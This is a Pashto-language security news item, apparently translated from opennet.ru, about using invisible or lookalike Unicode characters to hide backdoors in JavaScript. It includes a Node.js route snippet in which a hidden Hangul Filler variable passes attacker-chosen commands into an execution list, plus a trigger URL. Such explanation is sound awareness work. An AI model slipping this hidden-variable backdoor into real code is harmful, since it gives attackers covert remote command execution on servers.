په جاواسکریپټ کوډ کې د عملونو پټولو لپاره د ناڅرګند یونیکوډ کرکټرونو کارول

د ټروجن سرچینې برید میتود تعقیب ، کوم چې د یونیکوډ حروفونو کارولو پراساس دی چې د دوه اړخیز متن د ښودلو ترتیب بدلوي ، د پټو کړنو معرفي کولو لپاره بل تخنیک خپور شوی چې د جاواسکریپټ کوډ لپاره پلي کیږي. نوې میتود د یونیکوډ کرکټر "ㅤ" (کوډ 0x3164، "هانګول فلر") کارولو پراساس دی ، کوم چې د لیکونو کټګورۍ پورې اړه لري ، مګر هیڅ څرګند مینځپانګه نلري. د یونیکوډ کټګورۍ چې دا کرکټر پکې تړاو لري د ECMAScript 2015 مشخصاتو راهیسې د JavaScript متغیر نومونو کې کارولو لپاره اجازه ورکړل شوې ، دا امکان ورکوي چې د نه لید متغیرونو یا نوي متغیرونو رامینځته کړي چې د مشهور کوډ ایډیټرونو لکه Notepad++ او VS Code کې د نورو متغیرونو څخه د توپیر وړ ندي.

د مثال په توګه، د Node.js پلیټ فارم لپاره کوډ ورکړل شوی، په کوم کې چې د یو واحد کرکټر "ㅤ" څخه جوړ شوي متغیر په کارولو سره، یو شاته دروازه پټه ده چې د برید کونکي لخوا ټاکل شوي کوډ اجرا کولو ته اجازه ورکوي: app.get('/ network_health', async (req, res) = > {const { timeout,ㅤ} = req.query؛ // په حقیقت کې دا وايي "const { timeout,ㅤ \u3164}" const checkCommands = [ 'ping -c 1 google. com', 'curl -s http:// example.com/',ㅤ // کوما د کرکټر وروسته راځي \u3164 ];

په لومړي نظر کې ، یوازې د وخت پای ارزښت د بهرني پیرامیټر له لارې تیریږي ، او د اجرا کولو امرونو سره صف یو بې ضرر ثابت لیست لري. مګر په حقیقت کې ، د وخت پای متغیر وروسته ، د کرکټر کوډ \u3164 سره د بل ناڅرګند متغیر ارزښت ټاکل شوی ، کوم چې د اجرا وړ کمانډونو لړۍ کې هم ځای په ځای شوی. په دې توګه، که دا ډول ډیزاین شتون ولري، برید کوونکی کولی شي د "https://host:8080/network_health?%E3%85%A4=command" په څیر غوښتنه واستوي ترڅو د شاتنۍ دروازې فعاله کړي او د دوی کوډ اجرا کړي.

بله بیلګه د "ǃ" کرکټر (ALVEOLAR CLICK) دی، کوم چې د عجب ټکي د څرګندولو لپاره کارول کیدی شي. د مثال په توګه، بیان "if(environmentǃ=ENV_PROD){" کله چې په Node.js 14 کې اجرا کیږي تل به ریښتیا وي، ځکه چې دا توپیرونه نه ګوري، مګر د ENV_PROD ارزښت متغیر "چاپیر" ته ورکوي. نور ګمراه کوونکی یونیکوډ توري شامل دي "/"، "−" "+"، "⩵" "❨" "⫽" "꓿" او "∗".

سرچینه: opennet.ru

Add a comment